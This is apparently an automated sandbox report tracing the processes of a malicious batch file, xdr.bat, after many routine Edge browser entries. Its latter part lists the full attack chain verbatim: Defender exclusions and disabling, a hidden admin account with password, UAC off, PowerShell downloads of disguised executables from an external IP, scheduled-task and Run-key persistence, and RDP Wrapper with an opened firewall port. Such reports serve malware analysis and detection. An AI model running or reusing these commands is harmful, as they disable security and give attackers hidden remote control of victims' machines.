C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0d9e46f8,0x7fff0d9e4708,0x7fff0d9e47182⤵PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:82⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:12⤵PID:712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:82⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:12⤵PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:12⤵PID:5028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:12⤵PID:3196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵PID:2016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:12⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵PID:3860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:12⤵PID:368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:12⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:12⤵PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:12⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:12⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:12⤵PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:12⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:12⤵PID:3808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:12⤵PID:3136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:3316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:12⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6592 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\xdr.bat" "2⤵PID:772
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'c:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\system32\net.exenet user t1 Raed12346@@ /add3⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 Raed12346@@ /add4⤵PID:4564
-
-
-
C:\Windows\system32\net.exenet localgroup administrators t1 /add3⤵PID:4504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators t1 /add4⤵PID:832
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f3⤵
- Hide Artifacts: Hidden Users
PID:3740
-
-
C:\Windows\system32\net.exenet user t1 /active:no3⤵PID:1120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:no4⤵PID:1632
-
-
-
C:\Windows\system32\net.exenet user t1 /active:yes3⤵PID:4916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:yes4⤵PID:912
-
-
-
C:\Windows\system32\ReAgentc.exereagentc.exe /disable3⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:3932
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f3⤵PID:4824
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f3⤵PID:464
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f3⤵PID:4068
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f3⤵PID:2920
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f3⤵PID:4816
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f3⤵PID:4700
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4908
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f3⤵PID:3360
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵PID:2352
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f3⤵PID:852
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:3164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/111.jpg','C:\ProgramData\Windata\smhost.exe')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/222.jpg','C:\ProgramData\Windata\srlhost.exe')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x.jpg','C:\ProgramData\Windata\winlogin.exe')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "ngrok.zip" -DestinationPath "."3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4764
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata\*.*3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4044
-
-
C:\Windows\system32\attrib.exeattrib -s +h *.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4908
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:4416
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "WindowsPowerup_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:828
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsUpdate /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\smhost.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:2132
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "WindowsUpdate_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\smhost.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:4500
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 15 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Winlogo_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:60
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:3328
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "WindowsUp_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:3192
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"3⤵
- Adds Run key to start application
PID:2528
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "winlogo" /t REG_SZ /F /D "C:\ProgramData\Windata\winlogin.exe"3⤵
- Adds Run key to start application
PID:852
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdate" /t REG_SZ /F /D "C:\ProgramData\Windata\smhost.exe"3⤵
- Adds Run key to start application
PID:2604
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"3⤵
- Adds Run key to start application
PID:4348
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn Winupdate_Time /ru "Admin" /sc minute /mo 15 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it3⤵
- Scheduled Task/Job: Scheduled Task
PID:832
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:2736
-
-
C:\Windows\system32\schtasks.exeschtasks /run /tn winlogo3⤵PID:1576
-
-
C:\Windows\system32\schtasks.exeschtasks /run /tn WindowsUp3⤵PID:4764
-
-
C:\Windows\system32\schtasks.exeschtasks /run /tn WindowsPowerup3⤵PID:4416
-
-
C:\Windows\system32\schtasks.exeschtasks /run /tn WindowsUpdate3⤵PID:4500
-
-
C:\Windows\system32\attrib.exeattrib -s +h *.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3704
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\installer.bat3⤵
- Drops file in Program Files directory
PID:3328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\hrdp\install.bat4⤵PID:4100
-
C:\ProgramData\Windata\hrdp\RDPWInst.exe"C:\ProgramData\Windata\hrdp\RDPWInst" -i -o5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5468
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "update.zip" -DestinationPath "."4⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "autoupdate.zip" -DestinationPath "."4⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5784
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"4⤵
- Drops file in Program Files directory
